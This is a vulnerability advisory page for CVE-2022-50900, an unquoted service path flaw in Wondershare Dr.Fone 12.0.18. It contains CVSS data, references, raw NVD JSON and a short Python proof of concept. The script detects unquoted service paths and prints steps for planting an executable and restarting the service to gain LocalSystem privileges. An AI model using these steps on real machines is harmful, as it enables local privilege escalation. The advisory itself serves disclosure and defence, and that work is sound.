CVE-2022-50900

Description

Wondershare Dr.Fone 12.0.18 contains an unquoted service path vulnerability that allows local users to execute arbitrary code with elevated system privileges. Attackers can exploit the misconfigured service path to insert malicious code that will be executed with LocalSystem permissions during service startup.

CVSS Details

CVSS Score

8.4

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:wondershare:dr.fone:12.0.18:*:*:*:*:*:*:* - VULNERABLE

Wondershare Dr.Fone < 12.0.18

Wondershare InstallAssist (相关服务组件)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2022-50900 PoC - Wondershare Dr.Fone Unquoted Service Path
This PoC demonstrates the unquoted service path vulnerability in Wondershare Dr.Fone 12.0.18
Note: For educational and authorized testing purposes only
"""

import os
import sys
import ctypes
import subprocess

def check_service_path(service_name):
    """Check if the service has an unquoted path with spaces"""
    try:
        result = subprocess.run(
            ['sc', 'qc', service_name],
            capture_output=True,
            text=True
        )
        if 'BINARY_PATH_NAME' in result.stdout:
            print(f"[*] Checking service: {service_name}")
            for line in result.stdout.split('\n'):
                if 'BINARY_PATH_NAME' in line:
                    path = line.split(':', 1)[1].strip()
                    print(f"[+] Service path: {path}")
                    # Check if path contains spaces and is not quoted
                    if ' ' in path and not path.startswith('"'):
                        print("[!] VULNERABLE: Unquoted path with spaces detected!")
                        return True
            return False
    except Exception as e:
        print(f"[-] Error checking service: {e}")
    return False

def exploit_unquoted_path(malicious_exe_path, target_service):
    """
    Exploit unquoted service path by placing malicious executable
    This creates a file that will be executed instead of the legitimate service
    """
    # Extract the first directory name from the unquoted path
    # Example: C:\Program Files\Wondershare\Dr.Fone\bin\Service.exe
    # Attacker can place Program.exe in C:\
    print(f"[*] To exploit this vulnerability:")
    print(f"[1] Create a malicious executable at a path that matches the first segment")
    print(f"[2] Wait for the service to restart or force restart: sc stop {target_service} && sc start {target_service}")
    print(f"[3] The malicious code will execute with LocalSystem privileges")
    print(f"\n[!] This is for authorized security testing only!")

if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2022-50900 - Wondershare Dr.Fone Unquoted Service Path")
    print("=" * 60)
    
    # Check if running with admin privileges
    if ctypes.windll.shell32.IsUserAnAdmin():
        print("[+] Running with administrator privileges")
    else:
        print("[!] Warning: Not running as administrator")
    
    # Check for vulnerable service
    vulnerable_services = ['InstallAssist', 'DrFoneService', 'Wondershare Service']
    for svc in vulnerable_services:
        if check_service_path(svc):
            exploit_unquoted_path(None, svc)
            break

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2022-50900
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2022-50900
[3] CVE Details https://www.cvedetails.com/cve/CVE-2022-50900/
[4] VulDB https://vuldb.com/cve/CVE-2022-50900
[5] https://www.exploit-db.com/exploits/50813
[6] https://www.vulncheck.com/advisories/wondershare-drfone-wondershare-installassist-unquoted-service-path
[7] https://www.wondershare.com/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2022-50900", "sourceIdentifier": "[email protected]", "published": "2026-01-13T23:15:52.183", "lastModified": "2026-01-28T19:59:18.993", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Wondershare Dr.Fone 12.0.18 contains an unquoted service path vulnerability that allows local users to execute arbitrary code with elevated system privileges. Attackers can exploit the misconfigured service path to insert malicious code that will be executed with LocalSystem permissions during service startup."}, {"lang": "es", "value": "Wondershare Dr.Fone 12.0.18 contiene una vulnerabilidad de ruta de servicio sin comillas que permite a los usuarios locales ejecutar código arbitrario con privilegios de sistema elevados. Los atacantes pueden explotar la ruta de servicio mal configurada para insertar código malicioso que se ejecutará con permisos de LocalSystem durante el inicio del servicio."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-428"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wondershare:dr.fone:12.0.18:*:*:*:*:*:*:*", "matchCriteriaId": "F13A095F-E629-45EE-BEC3-3C9CEED231AB"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/50813", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://www.vulncheck.com/advisories/wondershare-drfone-wondershare-installassist-unquoted-service-path", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.wondershare.com/", "source": "[email protected]", "tags": ["Product"]}]}}